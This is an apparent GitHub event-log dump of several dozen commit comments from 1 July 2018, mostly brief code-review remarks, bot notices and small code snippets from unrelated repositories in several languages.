{"id":"7903090492","type":"CommitCommentEvent","actor":{"login":"maryamyasaei"},"repo":{"name":"evenset/ketabdan-project"},"payload":{"comment":{"id":29558109,"position":null,"line":null,"path":null,"commit_id":"fe2857a2d03421becf027fad9b84696444b4bc4c","created_at":"2018-07-01T14:06:27Z","updated_at":"2018-07-01T14:06:27Z","author_association":"COLLABORATOR","body":"![screenshot from 2018-07-02 00-01-57](https://user-images.githubusercontent.com/28941044/42135250-bf0a60c4-7d8b-11e8-804e-4252ff53d61a.png)\r\n"}},"created_at":"2018-07-01T14:06:27Z"}
{"id":"7903091444","type":"CommitCommentEvent","actor":{"login":"MrJacz"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29558111,"position":5,"line":39,"path":"events/guildMemberAdd.js","commit_id":"90df19b7cc494da26b21312e7df35f719f2157a5","created_at":"2018-07-01T14:07:06Z","updated_at":"2018-07-01T14:07:06Z","author_association":"COLLABORATOR","body":"once again, this should be `msg.displayName`"}},"created_at":"2018-07-01T14:07:06Z"}
{"id":"7903091607","type":"CommitCommentEvent","actor":{"login":"MrJacz"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29558112,"position":5,"line":32,"path":"events/guildMemberRemove.js","commit_id":"90df19b7cc494da26b21312e7df35f719f2157a5","created_at":"2018-07-01T14:07:12Z","updated_at":"2018-07-01T14:07:12Z","author_association":"COLLABORATOR","body":"same here"}},"created_at":"2018-07-01T14:07:12Z"}
{"id":"7903091712","type":"CommitCommentEvent","actor":{"login":"MrJacz"},"repo":{"name":"AdityaTD/PenguBot"},"payload":{"comment":{"id":29558113,"position":5,"line":39,"path":"monitors/customCommands.js","commit_id":"90df19b7cc494da26b21312e7df35f719f2157a5","created_at":"2018-07-01T14:07:17Z","updated_at":"2018-07-01T14:07:17Z","author_association":"COLLABORATOR","body":"same here"}},"created_at":"2018-07-01T14:07:17Z"}
{"id":"7903092399","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.03"},"payload":{"comment":{"id":29558114,"position":24,"line":24,"path":"Logic.Task2.Tests/AdditionalMathPackTests.cs","commit_id":"fa8a44b0bbbfe21bd8549685093e3fe7fa6f17f9","created_at":"2018-07-01T14:07:44Z","updated_at":"2018-07-01T14:07:44Z","author_association":"NONE","body":"Почему бы не объединить Ваши тестовые методы, поскольку они тестируют выброс одного типа исключения , а из атрибутов будет понятны провальные случаи\r\n\r\n"}},"created_at":"2018-07-01T14:07:44Z"}
{"id":"7903095205","type":"CommitCommentEvent","actor":{"login":"little-hao"},"repo":{"name":"little-hao/konghao.github.io"},"payload":{"comment":{"id":29558122,"position":null,"line":null,"path":null,"commit_id":"d3c199a3e883006ad013c407104c4ff62475fd53","created_at":"2018-07-01T14:09:41Z","updated_at":"2018-07-01T14:09:41Z","author_association":"OWNER","body":"-## Welcome to GitHub Pages \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-You can use the [editor on GitHub](https://github.com/little-hao/kinghao.github.io/edit/master/index.md) to maintain and preview the content for your website in Markdown files. \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files. \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-### Markdown \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-Markdown is a lightweight and easy-to-use syntax for styling your writing. It includes conventions for \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-```markdown \r\n\r\n\r\n \r\n-Syntax highlighted code block \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-# Header 1 \r\n\r\n\r\n \r\n-## Header 2 \r\n\r\n\r\n \r\n-### Header 3 \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-- Bulleted \r\n\r\n\r\n \r\n-- List \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-1. Numbered \r\n\r\n\r\n \r\n-2. List \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-**Bold** and _Italic_ and `Code` text \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-[Link](url) and ![Image](src) \r\n\r\n\r\n \r\n-``` \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/). \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-### Jekyll Themes \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-Your Pages site will use the layout and styles from the Jekyll theme you have selected in your [repository settings](https://github.com/little-hao/kinghao.github.io/settings). The name of this theme is saved in the Jekyll `_config.yml` configuration file. \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-### Support or Contact \r\n\r\n\r\n \r\n- \r\n\r\n\r\n \r\n-Having trouble with Pages? Check out our [documentation](https://help.github.com/categories/github-pages-basics/) or [contact support](https://github.com/contact) and we’ll help you sort it out. "}},"created_at":"2018-07-01T14:09:41Z"}
{"id":"7903096090","type":"CommitCommentEvent","actor":{"login":"Glavin001"},"repo":{"name":"muuvmuuv/vscode"},"payload":{"comment":{"id":29558123,"position":45,"line":14,"path":"src/index.ts","commit_id":"0a3bf19e4e7e62ce6b2f939bb98ce9939dea3e20","created_at":"2018-07-01T14:10:14Z","updated_at":"2018-07-01T14:10:14Z","author_association":"NONE","body":"This is a big change. I think it is only formatting changes?"}},"created_at":"2018-07-01T14:10:14Z"}
{"id":"7903096985","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29558125,"position":5,"line":5,"path":"Algorithms/RootFinder.cs","commit_id":"250a37a09dc9a469aca4deb1545994e430d6d2ea","created_at":"2018-07-01T14:10:47Z","updated_at":"2018-07-01T14:10:47Z","author_association":"NONE","body":"- По-прежнему делаете комиты того, что не нужно, сольшена, прожекта... - обязательно с этим разберитесь"}},"created_at":"2018-07-01T14:10:47Z"}
{"id":"7903097763","type":"CommitCommentEvent","actor":{"login":"Keerthanrao"},"repo":{"name":"Keerthanrao/Project"},"payload":{"comment":{"id":29558127,"position":21,"line":21,"path":"cachematrix.R","commit_id":"84e850798ca0b1f47d1174149b1bdcfd734d7387","created_at":"2018-07-01T14:11:19Z","updated_at":"2018-07-01T14:11:19Z","author_association":"OWNER","body":"cacheSolve: computes the inverse of the special \"matrix\" returned by makeCacheMatrix above.  \r\n22 ## If the inverse has already been calculated (and the matrix has not changed),  \r\n23 ## then the cachesolve should retrieve the inverse from the cache. \r\n"}},"created_at":"2018-07-01T14:11:19Z"}
{"id":"7903099226","type":"CommitCommentEvent","actor":{"login":"Keerthanrao"},"repo":{"name":"Keerthanrao/Project"},"payload":{"comment":{"id":29558130,"position":5,"line":5,"path":"cachematrix.R","commit_id":"84e850798ca0b1f47d1174149b1bdcfd734d7387","created_at":"2018-07-01T14:12:17Z","updated_at":"2018-07-01T14:12:17Z","author_association":"OWNER","body":"makeCacheMatrix:creates a special \"matrix\" object that can cache its inverse"}},"created_at":"2018-07-01T14:12:17Z"}
{"id":"7903101045","type":"CommitCommentEvent","actor":{"login":"Jucachaves"},"repo":{"name":"Jucachaves/Projeto-Programa-o-Orientada-a-Objetos"},"payload":{"comment":{"id":29558132,"position":null,"line":null,"path":null,"commit_id":"07b6d47c456fdd0c0fbf77c77eb56e70040b7196","created_at":"2018-07-01T14:13:29Z","updated_at":"2018-07-01T14:13:29Z","author_association":"OWNER","body":"Para que o código funcione corretamente é necessário baixar ou instalar no NetBeans a paleta jcalendar-tz-1.3.3-4.jar. Ou substituir por uma paleta que você tenha personalizada, substituindo o campo da tela data... com o campo respectivo de sua paleta."}},"created_at":"2018-07-01T14:13:29Z"}
{"id":"7903102025","type":"CommitCommentEvent","actor":{"login":"glassez"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29558134,"position":15,"line":63,"path":"src/base/utils/foreignapps.cpp","commit_id":"f1c24cf720514b47090b61e168df19d3484198c3","created_at":"2018-07-01T14:14:10Z","updated_at":"2018-07-01T14:14:10Z","author_association":"MEMBER","body":"I would use the following code:\r\n```c++\r\nconst int idx = versionStr.indexOf(QRegularExpression(\"[^\\\\.\\\\d]\"));\r\nversionStr.truncate(idx);\r\n```\r\nto cover more inappropriate cases."}},"created_at":"2018-07-01T14:14:10Z"}
{"id":"7903102774","type":"CommitCommentEvent","actor":{"login":"Jucachaves"},"repo":{"name":"Jucachaves/Projeto-Programa-o-Orientada-a-Objetos"},"payload":{"comment":{"id":29558136,"position":null,"line":null,"path":null,"commit_id":"07b6d47c456fdd0c0fbf77c77eb56e70040b7196","created_at":"2018-07-01T14:14:43Z","updated_at":"2018-07-01T14:14:43Z","author_association":"OWNER","body":"Projeto para controlar presença de alunos em eventos."}},"created_at":"2018-07-01T14:14:43Z"}
{"id":"7903103125","type":"CommitCommentEvent","actor":{"login":"altendky"},"repo":{"name":"ebroecker/canmatrix"},"payload":{"comment":{"id":29558138,"position":102,"line":249,"path":"canmatrix/canmatrix.py","commit_id":"a8893523319c4ede32e59ee19bf8420095945e41","created_at":"2018-07-01T14:14:58Z","updated_at":"2018-07-01T14:14:58Z","author_association":"COLLABORATOR","body":"https://github.com/python-attrs/attrs/issues/240"}},"created_at":"2018-07-01T14:14:58Z"}
{"id":"7903103329","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29558141,"position":73,"line":73,"path":"Algorithms/RootFinder.cs","commit_id":"250a37a09dc9a469aca4deb1545994e430d6d2ea","created_at":"2018-07-01T14:15:07Z","updated_at":"2018-07-01T14:15:07Z","author_association":"NONE","body":" Если уж выделили это как функцию, то проситься \r\nprivate static double SetNewIterationValue(double current, int power, double number)\r\n       => (((power - 1) * current) + (number / Math.Pow(current, power - 1))) / power;"}},"created_at":"2018-07-01T14:15:07Z"}
{"id":"7903104568","type":"CommitCommentEvent","actor":{"login":"jenstornell"},"repo":{"name":"jenstornell/kirby-status"},"payload":{"comment":{"id":29558147,"position":null,"line":null,"path":null,"commit_id":"1434f205f18932514a7f3aa77f87b3abbf5ea556","created_at":"2018-07-01T14:15:58Z","updated_at":"2018-07-01T14:15:58Z","author_association":"OWNER","body":"I don't see any difference in the code."}},"created_at":"2018-07-01T14:15:58Z"}
{"id":"7903105478","type":"CommitCommentEvent","actor":{"login":"levush"},"repo":{"name":"han-so1omon/c-ringbuf"},"payload":{"comment":{"id":29558149,"position":null,"line":null,"path":null,"commit_id":"2eea7c53c2e10cc2efd79cf3e88a42f3b3cbac41","created_at":"2018-07-01T14:16:33Z","updated_at":"2018-07-01T14:16:33Z","author_association":"NONE","body":"not really needed, right ?"}},"created_at":"2018-07-01T14:16:33Z"}
{"id":"7903108652","type":"CommitCommentEvent","actor":{"login":"chmst"},"repo":{"name":"chmst/joomla-cms"},"payload":{"comment":{"id":29558150,"position":null,"line":null,"path":null,"commit_id":"c8379fa2d2c2494353a6eacbbabe8f6a384baff2","created_at":"2018-07-01T14:18:43Z","updated_at":"2018-07-01T14:18:43Z","author_association":"OWNER","body":"Modified the layout. So it is similiar to com_content articles and users. \r\n![view_menus_new2](https://user-images.githubusercontent.com/1035262/42135365-6556750e-7d4a-11e8-947c-8bf36c042fc7.PNG)\r\n"}},"created_at":"2018-07-01T14:18:43Z"}
{"id":"7903109343","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"andrej2012/NET.S.2018.Kozlovski.02"},"payload":{"comment":{"id":29558152,"position":19,"line":19,"path":"FirstTask/FindNthRootClass.cs","commit_id":"862e9dc5e175d9d4eea1c00a0ead7e8e1c8191e2","created_at":"2018-07-01T14:19:10Z","updated_at":"2018-07-01T14:19:10Z","author_association":"NONE","body":"- XML комментарии для исключений?"}},"created_at":"2018-07-01T14:19:10Z"}
{"id":"7903109980","type":"CommitCommentEvent","actor":{"login":"stefangordon"},"repo":{"name":"capitalone/cloud-custodian"},"payload":{"comment":{"id":29558153,"position":23,"line":40,"path":"tools/c7n_gcp/c7n_gcp/mu.py","commit_id":"34f70a6ac1ec32cc034922f890191c090a152a6d","created_at":"2018-07-01T14:19:35Z","updated_at":"2018-07-01T14:19:35Z","author_association":"COLLABORATOR","body":"1.7.3 maybe"}},"created_at":"2018-07-01T14:19:35Z"}
{"id":"7903110330","type":"CommitCommentEvent","actor":{"login":"altendky"},"repo":{"name":"ebroecker/canmatrix"},"payload":{"comment":{"id":29558155,"position":127,"line":274,"path":"canmatrix/canmatrix.py","commit_id":"a8893523319c4ede32e59ee19bf8420095945e41","created_at":"2018-07-01T14:19:48Z","updated_at":"2018-07-01T14:19:48Z","author_association":"COLLABORATOR","body":"Are you looking to do type annotations?  I don't think `type=` does anything else.  I personally haven't bothered trying to get into type annotations yet.  MIght be worth reading up on that separately if you want it.  For example, this should probably be `typing.MutableMapping` instead of `dict` so duck typing can be retained without warnings for people that use tools to check the typing info.\r\n\r\nhttps://docs.python.org/3/library/typing.html#typing.MutableMapping"}},"created_at":"2018-07-01T14:19:48Z"}
{"id":"7903110465","type":"CommitCommentEvent","actor":{"login":"anonymous-coder"},"repo":{"name":"anonymous-coder/Project-M5-One"},"payload":{"comment":{"id":29558156,"position":null,"line":null,"path":null,"commit_id":"18a4bbb4584598d517098d884e6b7a89cc02ce4e","created_at":"2018-07-01T14:19:53Z","updated_at":"2018-07-01T14:19:53Z","author_association":"OWNER","body":"removed"}},"created_at":"2018-07-01T14:19:53Z"}
{"id":"7903111418","type":"CommitCommentEvent","actor":{"login":"leonpoint"},"repo":{"name":"FHellmann/Uniatron"},"payload":{"comment":{"id":29558157,"position":23,"line":51,"path":"app/src/main/java/com/edu/uni/augsburg/uniatron/ui/setting/SettingViewModel.java","commit_id":"90a4015127e9dba162870e34fa3abd096faeb185","created_at":"2018-07-01T14:20:29Z","updated_at":"2018-07-01T14:20:29Z","author_association":"COLLABORATOR","body":"automerge failed"}},"created_at":"2018-07-01T14:20:29Z"}
{"id":"7903123788","type":"CommitCommentEvent","actor":{"login":"levush"},"repo":{"name":"tverbin/c-ringbuf"},"payload":{"comment":{"id":29558180,"position":null,"line":null,"path":null,"commit_id":"28fa767271ef322492197cde54b1ae317aed55b3","created_at":"2018-07-01T14:28:52Z","updated_at":"2018-07-01T14:28:52Z","author_association":"NONE","body":"good change. I will fork from here as I will contribute some stuff to it."}},"created_at":"2018-07-01T14:28:52Z"}
{"id":"7903125604","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"gepd/Deviot"},"payload":{"comment":{"id":29558181,"position":null,"line":null,"path":null,"commit_id":"657a6dc7945571c0dea36433a9b95bfa4b88c383","created_at":"2018-07-01T14:30:01Z","updated_at":"2018-07-01T14:30:01Z","author_association":"NONE","body":"hmm , not seeing this problem anymore, maybe it was on windows only, I will test again.\r\nBut it was making a new column everytime I selected a serial port."}},"created_at":"2018-07-01T14:30:01Z"}
{"id":"7903127109","type":"CommitCommentEvent","actor":{"login":"Mee42"},"repo":{"name":"Mee42/GumboCoin"},"payload":{"comment":{"id":29558185,"position":41,"line":41,"path":"src/main/java/com/carson/network/BlockchainServerHandleRemake.java","commit_id":"db026ce15dc111e0c4c2a87c26bf1fe9f1802319","created_at":"2018-07-01T14:30:58Z","updated_at":"2018-07-01T14:30:58Z","author_association":"OWNER","body":"debating removing poll time, keep it locked at 30"}},"created_at":"2018-07-01T14:30:58Z"}
{"id":"7903128406","type":"CommitCommentEvent","actor":{"login":"c-ney"},"repo":{"name":"singularityware/singularity"},"payload":{"comment":{"id":29558188,"position":12,"line":52,"path":"debian/changelog","commit_id":"8d0595cef8eda202dfbc2d1e77cc661190fa3be1","created_at":"2018-07-01T14:31:48Z","updated_at":"2018-07-01T14:31:48Z","author_association":"NONE","body":"Is it correct that the asterisk was removed?"}},"created_at":"2018-07-01T14:31:48Z"}
{"id":"7903128432","type":"CommitCommentEvent","actor":{"login":"JHenneberg"},"repo":{"name":"dongli/fortran-unit-test"},"payload":{"comment":{"id":29558189,"position":null,"line":null,"path":null,"commit_id":"28142e9b805433dd5bb7ae562e469cfc8a68747e","created_at":"2018-07-01T14:31:49Z","updated_at":"2018-07-01T14:31:49Z","author_association":"CONTRIBUTOR","body":"hey,\r\nwhy not to make file_name and line_number also optional, then there would not be any need for a second version for every subroutine?"}},"created_at":"2018-07-01T14:31:49Z"}
{"id":"7903128477","type":"CommitCommentEvent","actor":{"login":"ruped24"},"repo":{"name":"ruped24/toriptables2"},"payload":{"comment":{"id":29558190,"position":null,"line":null,"path":null,"commit_id":"6c2f9a339137e719c6b23db867815c9e8f931245","created_at":"2018-07-01T14:31:50Z","updated_at":"2018-07-01T14:31:50Z","author_association":"OWNER","body":"Bug cause:\r\n1) http://jsonip[dot]com started using Let's Encrypt.\r\n2) urllib2 seems to no longer verify server certificates by default sys.version_info >= ( 2, 7, 9 )"}},"created_at":"2018-07-01T14:31:50Z"}
{"id":"7903135004","type":"CommitCommentEvent","actor":{"login":"KLD"},"repo":{"name":"Monstring/Repos"},"payload":{"comment":{"id":29558197,"position":null,"line":null,"path":null,"commit_id":"e513d2c5754844084ab59f08a416676dc2213d67","created_at":"2018-07-01T14:36:21Z","updated_at":"2018-07-01T14:36:21Z","author_association":"NONE","body":"@Monstring  I can comment on a commit "}},"created_at":"2018-07-01T14:36:21Z"}
{"id":"7903135513","type":"CommitCommentEvent","actor":{"login":"KLD"},"repo":{"name":"Monstring/Repos"},"payload":{"comment":{"id":29558198,"position":21,"line":33,"path":"Super Linegon/Assets/Scripts/CharacterMovement.cs","commit_id":"e513d2c5754844084ab59f08a416676dc2213d67","created_at":"2018-07-01T14:36:43Z","updated_at":"2018-07-01T14:36:43Z","author_association":"NONE","body":"I can comment on a code line "}},"created_at":"2018-07-01T14:36:43Z"}
{"id":"7903136031","type":"CommitCommentEvent","actor":{"login":"barbudreadmon"},"repo":{"name":"libretro/fbalpha"},"payload":{"comment":{"id":29558199,"position":null,"line":null,"path":null,"commit_id":"9d1b3af1f9b2933c08d2a36f97c32f5ed88de2a3","created_at":"2018-07-01T14:37:05Z","updated_at":"2018-07-01T14:37:05Z","author_association":"CONTRIBUTOR","body":"fba codebase uses tab indentation, so i'm doing the same in libretro.cpp when i work on it."}},"created_at":"2018-07-01T14:37:05Z"}
{"id":"7903137501","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-laplacesdemon-feedstock"},"payload":{"comment":{"id":29558203,"position":null,"line":null,"path":null,"commit_id":"c27ddf2e7f904f7d47681d29c5df405309da2215","created_at":"2018-07-01T14:38:03Z","updated_at":"2018-07-01T14:38:03Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @arnekr, @frodepedersen were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @arnekr, @frodepedersen were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T14:38:03Z"}
{"id":"7903138708","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29558204,"position":null,"line":null,"path":null,"commit_id":"79a32c2368d19990d1e98a430bc67bb377d8cc0c","created_at":"2018-07-01T14:38:50Z","updated_at":"2018-07-01T14:38:50Z","author_association":"NONE","body":"Looks interesting, good luck!"}},"created_at":"2018-07-01T14:38:50Z"}
{"id":"7903138777","type":"CommitCommentEvent","actor":{"login":"june29"},"repo":{"name":"ecitonon/bookmark"},"payload":{"comment":{"id":29558205,"position":null,"line":null,"path":null,"commit_id":"9e9ab36353766085f1605ba710f0f1554b281865","created_at":"2018-07-01T14:38:52Z","updated_at":"2018-07-01T14:38:52Z","author_association":"COLLABORATOR","body":":joy:\r\n"}},"created_at":"2018-07-01T14:38:52Z"}
{"id":"7903139034","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558206,"position":null,"line":null,"path":null,"commit_id":"c402804b32d7cc1f9b70ddb5521d26e37c5947aa","created_at":"2018-07-01T14:39:05Z","updated_at":"2018-07-01T14:39:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-143904 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-143904\") to [dev](https://console.bluemix.net/apps/88912cf2-ca6d-40fc-81d8-d6e3c394caef?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T14:39:05Z"}
{"id":"7903143146","type":"CommitCommentEvent","actor":{"login":"yuriiveremiienko"},"repo":{"name":"korobochka/cucumberjs-allure2-reporter"},"payload":{"comment":{"id":29558215,"position":null,"line":null,"path":null,"commit_id":"16d61e33947c4069bc6362b80fea320d73143a01","created_at":"2018-07-01T14:41:49Z","updated_at":"2018-07-01T14:41:49Z","author_association":"NONE","body":"please update docs\r\nnew AllureRuntime({ resultsDir: \"./out/allure-results\" }) => new AllureRuntime(new AllureConfig(\"./out/allure-results\"))\r\n\r\nps. thank you for your hard work, this works awesome =)"}},"created_at":"2018-07-01T14:41:49Z"}
{"id":"7903144892","type":"CommitCommentEvent","actor":{"login":"Chapo0"},"repo":{"name":"alfonsokim/espanto"},"payload":{"comment":{"id":29558218,"position":null,"line":null,"path":null,"commit_id":"3908b2cbe7c3dd4138645c230ddf61e0592e187b","created_at":"2018-07-01T14:43:01Z","updated_at":"2018-07-01T14:43:01Z","author_association":"NONE","body":"@@ -0,0 +1,4 @@\r\n+# espanto\r\n+## Extractor de datos de estados de cuenta de Banamex\r\n+\r\n+Extrae los movimientos de los estados de cuenta de Banamex y los inserta en la base de datos"}},"created_at":"2018-07-01T14:43:01Z"}
{"id":"7903147371","type":"CommitCommentEvent","actor":{"login":"Rungang"},"repo":{"name":"Rungang/supervised_tensor_completion"},"payload":{"comment":{"id":29558224,"position":null,"line":null,"path":null,"commit_id":"2419f0232ad3982a2930b436711e9e0703ef256f","created_at":"2018-07-01T14:44:45Z","updated_at":"2018-07-01T14:44:45Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-01T14:44:45Z"}
{"id":"7903147454","type":"CommitCommentEvent","actor":{"login":"Lonami"},"repo":{"name":"uniborg/uniborg"},"payload":{"comment":{"id":29558225,"position":5,"line":39,"path":"uniborg/_core.py","commit_id":"863c35f8b513e5b1e79fb84d39d2dac3a338b38b","created_at":"2018-07-01T14:44:49Z","updated_at":"2018-07-01T14:44:49Z","author_association":"CONTRIBUTOR","body":"I disagree with this change. If the user wants to disable `_core` they should be able to."}},"created_at":"2018-07-01T14:44:49Z"}
{"id":"7903148068","type":"CommitCommentEvent","actor":{"login":"Lonami"},"repo":{"name":"uniborg/uniborg"},"payload":{"comment":{"id":29558227,"position":null,"line":null,"path":null,"commit_id":"863c35f8b513e5b1e79fb84d39d2dac3a338b38b","created_at":"2018-07-01T14:45:15Z","updated_at":"2018-07-01T14:45:15Z","author_association":"CONTRIBUTOR","body":"I disagree with this commit message. It's not self-explanatory."}},"created_at":"2018-07-01T14:45:15Z"}
{"id":"7903148506","type":"CommitCommentEvent","actor":{"login":"Lonami"},"repo":{"name":"uniborg/uniborg"},"payload":{"comment":{"id":29558230,"position":7,"line":40,"path":"README.md","commit_id":"863c35f8b513e5b1e79fb84d39d2dac3a338b38b","created_at":"2018-07-01T14:45:34Z","updated_at":"2018-07-01T14:45:34Z","author_association":"CONTRIBUTOR","body":"You didn't even fix `as is as`."}},"created_at":"2018-07-01T14:45:34Z"}
{"id":"7903149357","type":"CommitCommentEvent","actor":{"login":"Streetwalrus"},"repo":{"name":"uniborg/uniborg"},"payload":{"comment":{"id":29558231,"position":7,"line":40,"path":"README.md","commit_id":"863c35f8b513e5b1e79fb84d39d2dac3a338b38b","created_at":"2018-07-01T14:46:00Z","updated_at":"2018-07-01T14:46:00Z","author_association":"MEMBER","body":"h\r\nunrelated"}},"created_at":"2018-07-01T14:46:00Z"}
{"id":"7903149742","type":"CommitCommentEvent","actor":{"login":"Streetwalrus"},"repo":{"name":"uniborg/uniborg"},"payload":{"comment":{"id":29558232,"position":5,"line":39,"path":"uniborg/_core.py","commit_id":"863c35f8b513e5b1e79fb84d39d2dac3a338b38b","created_at":"2018-07-01T14:46:11Z","updated_at":"2018-07-01T14:46:11Z","author_association":"MEMBER","body":"no u"}},"created_at":"2018-07-01T14:46:11Z"}
{"id":"7903150406","type":"CommitCommentEvent","actor":{"login":"Lonami"},"repo":{"name":"uniborg/uniborg"},"payload":{"comment":{"id":29558235,"position":null,"line":null,"path":null,"commit_id":"c1e3b2f3c351b38370972ae1150a868fb64761b7","created_at":"2018-07-01T14:46:40Z","updated_at":"2018-07-01T14:46:40Z","author_association":"CONTRIBUTOR","body":"[For shame](https://github.com/uniborg/uniborg/commit/863c35f8b513e5b1e79fb84d39d2dac3a338b38b)."}},"created_at":"2018-07-01T14:46:40Z"}
{"id":"7903153938","type":"CommitCommentEvent","actor":{"login":"meepen"},"repo":{"name":"meepen/salien-bot"},"payload":{"comment":{"id":29558239,"position":null,"line":null,"path":null,"commit_id":"81d35dcd9ac5761d4b8dd8068e567da48a524006","created_at":"2018-07-01T14:48:49Z","updated_at":"2018-07-01T14:48:49Z","author_association":"OWNER","body":"Accident, thanks for pointing it out"}},"created_at":"2018-07-01T14:48:49Z"}
{"id":"7903156561","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29558242,"position":15,"line":63,"path":"src/base/utils/foreignapps.cpp","commit_id":"f1c24cf720514b47090b61e168df19d3484198c3","created_at":"2018-07-01T14:50:34Z","updated_at":"2018-07-01T14:50:34Z","author_association":"MEMBER","body":"ok."}},"created_at":"2018-07-01T14:50:34Z"}
{"id":"7903158129","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.03"},"payload":{"comment":{"id":29558244,"position":24,"line":24,"path":"Logic.Task2.Tests/AdditionalMathPackTests.cs","commit_id":"fa8a44b0bbbfe21bd8549685093e3fe7fa6f17f9","created_at":"2018-07-01T14:51:36Z","updated_at":"2018-07-01T14:51:36Z","author_association":"OWNER","body":"Хорошо, спасибо большое."}},"created_at":"2018-07-01T14:51:36Z"}
{"id":"7903158630","type":"CommitCommentEvent","actor":{"login":"iKimon"},"repo":{"name":"iKimon/g7-lfg"},"payload":{"comment":{"id":29558245,"position":null,"line":null,"path":null,"commit_id":"c4aaa595333e94fe55fd9605e88b6dd06a0e1f20","created_at":"2018-07-01T14:51:54Z","updated_at":"2018-07-01T14:51:54Z","author_association":"OWNER","body":"Kopie von Ylen login.dart 01.07"}},"created_at":"2018-07-01T14:51:54Z"}
{"id":"7903164089","type":"CommitCommentEvent","actor":{"login":"JamesWuWjx"},"repo":{"name":"JamesWuWjx/My_Python"},"payload":{"comment":{"id":29558255,"position":null,"line":null,"path":null,"commit_id":"24ef02c877f7c3879ba79b19f3ae507b4ab7bef6","created_at":"2018-07-01T14:55:32Z","updated_at":"2018-07-01T14:55:32Z","author_association":"OWNER","body":"print('Hello world')"}},"created_at":"2018-07-01T14:55:32Z"}
{"id":"7903165692","type":"CommitCommentEvent","actor":{"login":"thomashorrobin"},"repo":{"name":"dylankbuckley/monzo-menubar-macos"},"payload":{"comment":{"id":29558258,"position":null,"line":null,"path":null,"commit_id":"d97747aec64f3ba9ac98e88a98b096d5a24ad58c","created_at":"2018-07-01T14:56:40Z","updated_at":"2018-07-01T14:56:40Z","author_association":"COLLABORATOR","body":"This is great but I wish it just worked out of the box"}},"created_at":"2018-07-01T14:56:40Z"}
{"id":"7903167155","type":"CommitCommentEvent","actor":{"login":"micfal"},"repo":{"name":"micfal/hello-world"},"payload":{"comment":{"id":29558262,"position":null,"line":null,"path":null,"commit_id":"7ada6b8030021e47ce42f006d44406dbd1869ee7","created_at":"2018-07-01T14:57:41Z","updated_at":"2018-07-01T14:57:41Z","author_association":"OWNER","body":"ancora un aggiornamento."}},"created_at":"2018-07-01T14:57:41Z"}
{"id":"7903168627","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29558264,"position":null,"line":null,"path":null,"commit_id":"cd2a2d65d6e799906bc58face44fd39d901ff1b1","created_at":"2018-07-01T14:58:45Z","updated_at":"2018-07-01T14:58:45Z","author_association":"OWNER","body":"LLR: 1.16 (-2.94,2.94) [0.00,5.00]\r\nTotal: 5961 W: 1348 L: 1267 D: 3346"}},"created_at":"2018-07-01T14:58:45Z"}
